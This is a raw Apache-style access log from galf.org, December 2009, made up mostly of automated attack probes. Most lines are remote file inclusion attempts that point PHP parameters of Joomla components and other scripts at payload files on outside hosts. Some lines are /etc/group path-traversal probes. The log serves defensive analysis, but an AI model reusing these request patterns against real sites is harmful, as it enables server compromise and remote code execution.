200.93.164.11 - - [20/Dec/2009:17:30:33 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hipponantes-courses.com/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.164.11 - - [20/Dec/2009:17:30:33 -0800] "GET /logs/access_090622.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hipponantes-courses.com/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.164.11 - - [20/Dec/2009:17:30:33 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hipponantes-courses.com/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:17:31:19 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.18.20.210 - - [20/Dec/2009:17:31:19 -0800] "GET /logs//include/write.php?dir=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.18.20.210 - - [20/Dec/2009:17:31:19 -0800] "GET /include/write.php?dir=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [20/Dec/2009:17:31:39 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:31:39 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:31:42 -0800] "GET /logs/access.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:31:43 -0800] "GET /logs/access_090817.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:17:31:44 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.18.20.210 - - [20/Dec/2009:17:31:44 -0800] "GET /include/write.php?dir=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.18.20.210 - - [20/Dec/2009:17:31:44 -0800] "GET /logs//include/write.php?dir=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.97.212.123 - - [20/Dec/2009:17:32:02 -0800] "GET /main.php?x=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:17:32:02 -0800] "GET /main.php?x=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:32:29 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:32:29 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:32:29 -0800] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:32:34 -0800] "GET /logs/access_090817.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [20/Dec/2009:17:32:36 -0800] "GET /logs///skin/happycast_category_darkblack//ask_password.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [20/Dec/2009:17:33:13 -0800] "GET //skin/happycast_category_darkblack//ask_password.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:17:33:29 -0800] "GET /errors.php?error=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:17:33:49 -0800] "GET /logs/access_090817.log/errors.php?error=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:17:33:49 -0800] "GET /logs/errors.php?error=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:17:34:14 -0800] "GET /logs/access_090706.log/?DOCUMENT_ROOT=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:17:34:14 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:17:34:14 -0800] "GET /?DOCUMENT_ROOT=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:17:34:19 -0800] "GET /logs/access_091130.log/errors.php?error=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:17:35:00 -0800] "GET /include/write.php?dir=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:17:35:00 -0800] "GET /logs/access_091019.log%20%20//include/write.php?dir=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:17:35:00 -0800] "GET /logs//include/write.php?dir=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:17:35:07 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:17:35:08 -0800] "GET /logs/access_090706.log/?DOCUMENT_ROOT=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:17:35:08 -0800] "GET /?DOCUMENT_ROOT=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:17:35:17 -0800] "GET /errors.php?error=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:17:35:17 -0800] "GET /logs/errors.php?error=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:17:35:17 -0800] "GET /logs/access_090817.log/errors.php?error=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:17:35:19 -0800] "GET /include/write.php?dir=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:17:35:19 -0800] "GET /logs//include/write.php?dir=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:17:35:19 -0800] "GET /logs/access_091019.log%20%20//include/write.php?dir=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:17:35:35 -0800] "GET /include/write.php?dir=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:17:35:35 -0800] "GET /logs//include/write.php?dir=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:17:35:35 -0800] "GET /logs/access_090706.log//include/write.php?dir=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:17:35:42 -0800] "GET /logs/access_090817.log%20%20/errors.php?error=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:17:36:00 -0800] "GET /include/write.php?dir=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:17:36:00 -0800] "GET /logs//include/write.php?dir=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:17:36:00 -0800] "GET /logs/access_090706.log//include/write.php?dir=http://www.elcanna.com/images/upload/events/hthumbs/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:17:36:00 -0800] "GET /logs/access_091130.log/errors.php?error=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:17:36:09 -0800] "GET /logs/access_091130.log%20%20/errors.php?error=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [20/Dec/2009:17:36:31 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [20/Dec/2009:17:36:37 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [20/Dec/2009:17:36:37 -0800] "GET /logs/access_091012.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [20/Dec/2009:17:36:37 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:17:36:50 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:17:36:50 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:17:36:50 -0800] "GET /logs/access_091012.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:17:37:17 -0800] "GET /logs/access_090629.log%20%20//include/admin.lib.inc.php?site_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:17:37:17 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:17:37:17 -0800] "GET /include/admin.lib.inc.php?site_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:17:37:25 -0800] "GET /include/admin.lib.inc.php?site_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:17:37:25 -0800] "GET /logs/access_090629.log%20%20//include/admin.lib.inc.php?site_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:17:37:25 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:17:37:34 -0800] "GET /logs/main.php?x=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:17:37:34 -0800] "GET /logs/main.php?x=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:17:37:35 -0800] "GET /logs/access_090713.log%20%20//include/admin.lib.inc.php?site_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:17:37:43 -0800] "GET /logs/access_090713.log%20%20//include/admin.lib.inc.php?site_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:17:38:01 -0800] "GET /logs/access_090817.log%20%20/errors.php?error=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:17:38:28 -0800] "GET /logs/access_091130.log%20%20/errors.php?error=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:17:39:58 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:17:39:58 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:17:39:58 -0800] "GET /logs/access_091012.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [20/Dec/2009:17:41:11 -0800] "GET /logs/access.log///skin/happycast_category_darkblack//ask_password.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [20/Dec/2009:17:41:17 -0800] "GET //vwar/backup/errors.php?error=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:17:41:17 -0800] "GET /logs/access_090921.log%20%20///vwar/backup/errors.php?error=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:17:41:17 -0800] "GET /logs///vwar/backup/errors.php?error=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:17:41:50 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:17:41:53 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:17:41:53 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:17:42:31 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:17:42:37 -0800] "GET //vwar/backup/errors.php?error=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:17:42:37 -0800] "GET /logs/access_090921.log%20%20///vwar/backup/errors.php?error=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:17:42:37 -0800] "GET /logs///vwar/backup/errors.php?error=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:17:43:19 -0800] "GET /logs/access_090706.log/errors.php?error=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:17:44:36 -0800] "GET /logs/access_090706.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.16.181 - - [20/Dec/2009:17:45:10 -0800] "GET /logs/access_090706.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.16.181 - - [20/Dec/2009:17:45:10 -0800] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.16.181 - - [20/Dec/2009:17:45:10 -0800] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:17:45:49 -0800] "GET /logs/access_090921.log///vwar/backup/errors.php?error=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [20/Dec/2009:17:46:19 -0800] "GET /logs///skin/happycast_category_darkblack//ask_password.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.122.19.24 - - [20/Dec/2009:17:46:44 -0800] "GET /logs/access_091109.log///skin/happycast_category_darkblack//ask_password.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:17:47:01 -0800] "GET /logs/access_090921.log///vwar/backup/errors.php?error=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:17:48:02 -0800] "GET /logs/access_091012.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [20/Dec/2009:17:48:47 -0800] "GET /logs/access_090706.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:17:49:02 -0800] "GET /logs/access_091012.log///vwar/backup/errors.php?error=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [20/Dec/2009:17:49:07 -0800] "GET /logs/access_090706.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [20/Dec/2009:17:50:18 -0800] "GET /logs/access_090921.log%20%20//xfsection/modify.php?dir_module=http://vrim.org/bbs//script/idxx.txt%20? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [20/Dec/2009:17:50:18 -0800] "GET /logs//xfsection/modify.php?dir_module=http://vrim.org/bbs//script/idxx.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [20/Dec/2009:17:50:18 -0800] "GET /xfsection/modify.php?dir_module=http://vrim.org/bbs//script/idxx.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [20/Dec/2009:17:50:20 -0800] "GET /logs/access_091109.log%20%20//xfsection/modify.php?dir_module=http://vrim.org/bbs//script/idxx.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [20/Dec/2009:17:50:28 -0800] "GET /logs/access_091012.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:17:50:30 -0800] "GET /logs/access_091012.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [20/Dec/2009:17:50:50 -0800] "GET /logs/access_091012.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [20/Dec/2009:17:51:52 -0800] "GET /logs/errors.php?error=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [20/Dec/2009:17:51:52 -0800] "GET /logs/access_090921.log%20%20/errors.php?error=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [20/Dec/2009:17:51:52 -0800] "GET /errors.php?error=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.29 - - [20/Dec/2009:17:52:45 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=69&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AT&T CSM7.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Comcast; Comcast)" "www.galf.org"
209.216.203.109 - - [20/Dec/2009:17:53:16 -0800] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.urmary.ru//appserv/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [20/Dec/2009:17:53:16 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.urmary.ru//appserv/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [20/Dec/2009:17:53:19 -0800] "GET /logs/access_091012.log%20%20/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.urmary.ru//appserv/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.174.65.34 - - [20/Dec/2009:17:53:25 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.174.65.34 - - [20/Dec/2009:17:53:26 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.174.65.34 - - [20/Dec/2009:17:53:26 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.174.65.34 - - [20/Dec/2009:17:53:26 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.216.203.109 - - [20/Dec/2009:17:53:36 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.urmary.ru//appserv/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [20/Dec/2009:17:53:36 -0800] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.urmary.ru//appserv/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [20/Dec/2009:17:53:36 -0800] "GET /logs/access_091012.log%20%20/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.urmary.ru//appserv/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [20/Dec/2009:17:53:46 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.urmary.ru//appserv/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [20/Dec/2009:17:53:46 -0800] "GET /logs/access_091012.log%20%20/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.urmary.ru//appserv/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [20/Dec/2009:17:53:46 -0800] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.urmary.ru//appserv/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.123 - - [20/Dec/2009:17:53:52 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:17:54:05 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
